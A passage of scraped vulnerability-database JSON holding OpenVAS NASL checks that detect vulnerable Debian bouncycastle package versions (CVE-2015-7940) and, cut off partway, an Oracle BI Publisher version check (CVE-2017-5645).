information:\nhttp://web-in-security.blogspot.ca/2015/09/practical-invalid-curve-attacks.html\nPractical Invalid Curve Attacks on TLS-ECDH:\nhttp://euklid.org/pdf/ECC_Invalid_Curve.pdf", "cvss3": {}, "published": "2015-12-14T00:00:00", "type": "openvas", "title": "Debian Security Advisory DSA 3417-1 (bouncycastle - security update)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-7940"], "modified": "2017-07-07T00:00:00", "id": "OPENVAS:703417", "href": "http://plugins.openvas.org/nasl.php?oid=703417", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_3417.nasl 6609 2017-07-07 12:05:59Z cfischer $\n# Auto-generated from advisory DSA 3417-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2015 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\n\nif(description)\n{\n script_id(703417);\n script_version(\"$Revision: 6609 $\");\n script_cve_id(\"CVE-2015-7940\");\n script_name(\"Debian Security Advisory DSA 3417-1 (bouncycastle - security update)\");\n script_tag(name: \"last_modification\", value: \"$Date: 2017-07-07 14:05:59 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name: \"creation_date\", value: \"2015-12-14 00:00:00 +0100 (Mon, 14 Dec 2015)\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_tag(name: \"solution_type\", value: \"VendorFix\");\n script_tag(name: \"qod_type\", value: \"package\");\n\n script_xref(name: \"URL\", value: \"http://www.debian.org/security/2015/dsa-3417.html\");\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2015 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name: \"affected\", value: \"bouncycastle on Debian Linux\");\n script_tag(name: \"solution\", value: \"For the oldstable distribution (wheezy),\nthis problem has been fixed in version 1.44+dfsg-3.1+deb7u1.\n\nFor the stable distribution (jessie), this problem has been fixed in\nversion 1.49+dfsg-3+deb8u1.\n\nFor the unstable distribution (sid), this problem has been fixed in\nversion 1.51-2.\n\nWe recommend that you upgrade your bouncycastle packages.\");\n script_tag(name: \"summary\", value: \"Tibor Jager, Jorg Schwenk, and\nJuraj Somorovsky, from Horst Gortz Institute for IT Security, published a\npaper in ESORICS 2015 where they describe an invalid curve attack in Bouncy\nCastle Crypto, a Java library for cryptography. An attacker is able to recover\nprivate Elliptic Curve keys from different applications, for example, TLS servers.\n\nMore information:\nhttp://web-in-security.blogspot.ca/2015/09/practical-invalid-curve-attacks.html\nPractical Invalid Curve Attacks on TLS-ECDH:\nhttp://euklid.org/pdf/ECC_Invalid_Curve.pdf\");\n script_tag(name: \"vuldetect\", value: \"This check tests the installed software\nversion using the apt package manager.\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"libbcmail-java\", ver:\"1.44+dfsg-3.1+deb7u1\", rls_regex:\"DEB7.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libbcmail-java-doc\", ver:\"1.44+dfsg-3.1+deb7u1\", rls_regex:\"DEB7.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libbcmail-java-gcj\", ver:\"1.44+dfsg-3.1+deb7u1\", rls_regex:\"DEB7.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libbcpg-java\", ver:\"1.44+dfsg-3.1+deb7u1\", rls_regex:\"DEB7.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libbcpg-java-doc\", ver:\"1.44+dfsg-3.1+deb7u1\", rls_regex:\"DEB7.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libbcpg-java-gcj\", ver:\"1.44+dfsg-3.1+deb7u1\", rls_regex:\"DEB7.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libbcprov-java\", ver:\"1.44+dfsg-3.1+deb7u1\", rls_regex:\"DEB7.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libbcprov-java-doc\", ver:\"1.44+dfsg-3.1+deb7u1\", rls_regex:\"DEB7.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libbcprov-java-gcj\", ver:\"1.44+dfsg-3.1+deb7u1\", rls_regex:\"DEB7.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libbctsp-java\", ver:\"1.44+dfsg-3.1+deb7u1\", rls_regex:\"DEB7.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libbctsp-java-doc\", ver:\"1.44+dfsg-3.1+deb7u1\", rls_regex:\"DEB7.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libbctsp-java-gcj\", ver:\"1.44+dfsg-3.1+deb7u1\", rls_regex:\"DEB7.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libbcmail-java\", ver:\"1.49+dfsg-3+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libbcmail-java-doc\", ver:\"1.49+dfsg-3+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libbcpg-java\", ver:\"1.49+dfsg-3+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libbcpg-java-doc\", ver:\"1.49+dfsg-3+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libbcpkix-java\", ver:\"1.49+dfsg-3+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libbcpkix-java-doc\", ver:\"1.49+dfsg-3+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libbcprov-java\", ver:\"1.49+dfsg-3+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libbcprov-java-doc\", ver:\"1.49+dfsg-3+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2019-05-29T18:33:49", "description": "This host is installed with Oracle BI Publisher\n and is prone to a code execution vulnerability.", "cvss3": {}, "published": "2018-10-18T00:00:00", "type": "openvas", "title": "Oracle BI Publisher Code Execution Vulnerability (oct2018-4428296)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-5645"], "modified": "2019-05-17T00:00:00", "id": "OPENVAS:1361412562310814409", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310814409", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Oracle BI Publisher Code Execution Vulnerability (oct2018-4428296)\n#\n# Authors:\n# Rinu Kuriakose <krinu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:oracle:business_intelligence_publisher\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.814409\");\n script_version(\"2019-05-17T10:45:27+0000\");\n script_cve_id(\"CVE-2017-5645\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2019-05-17 10:45:27 +0000 (Fri, 17 May 2019)\");\n script_tag(name:\"creation_date\", value:\"2018-10-18 16:42:53 +0530 (Thu, 18 Oct 2018)\");\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n script_name(\"Oracle BI Publisher Code Execution Vulnerability (oct2018-4428296)\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Oracle BI Publisher\n and is prone to a code execution vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Check if a vulnerable version is present\n on the target host.\");\n\n script_tag(name:\"insight\", value:\"The flaw exist due to an unspecified\n error in BI Publisher Security (Apache Log4j) component.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow\n attackers to execute arbitrary code.\");\n\n script_tag(name:\"affected\", value:\"Oracle BI Publisher versions 11.1.1.7.0,\n 11.1.1.9.0, 12.2.1.3.0 and 12.2.1.4.0\");\n\n script_tag(name:\"solution\", value:\"Apply the latest patch from vendor. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFi

Oracle Fusion Middleware Oracle HTTP Server Multiple Vulnerabilities (January 2018 CPU)

Description

Related